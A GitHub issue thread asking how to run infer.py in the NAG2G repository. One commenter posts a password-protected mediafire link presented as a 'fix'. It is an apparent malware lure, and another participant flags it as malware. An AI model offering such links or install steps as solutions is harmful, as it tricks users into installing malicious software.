### ISSUE TITLE
How to run infer.py file? No documentation or script like valid.sh provided

### ISSUE THREAD

**Issue by mujeebarshad** [dptech-corp/NAG2G#5]
I would like to use the `infer.py` file in this repository, but I couldn't find any documentation or example scripts similar to `valid.sh` for `validate.py`. Could you please provide guidance on how to properly run `infer.py`, including any necessary command-line arguments, sample scripts, or required configurations? This would greatly help in utilizing the inference capabilities of the model.

Thank you!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mujeebarshad** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

What does this file exactly do?

**Comment by mujeebarshad** [comment]
@synsis Is the provided solution valid?

**Comment by mujeebarshad** [comment]
> https://app.mediafire.com/dqajf1x14ccfd

Let me try and get back to you thanks.

**Comment by mujeebarshad** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

@synsis is this an authentic solution?

**Comment by mmfahmi** [comment]
> > https://app.mediafire.com/dqajf1x14ccfd
> 
> Let me try and get back to you thanks.

do not download that file or press that link,
it containes malware, be careful of solutions that redirects you to different sites and telling you to download something

**Comment by mujeebarshad** [comment]
Resolved it by running on GPU using Google Colab

**Comment by FoxEdward** [comment]
> Resolved it by running on GPU using Google Colab

Could you please tell me how to use the infer.py? Especially the --arch argument, thanks @mujeebarshad
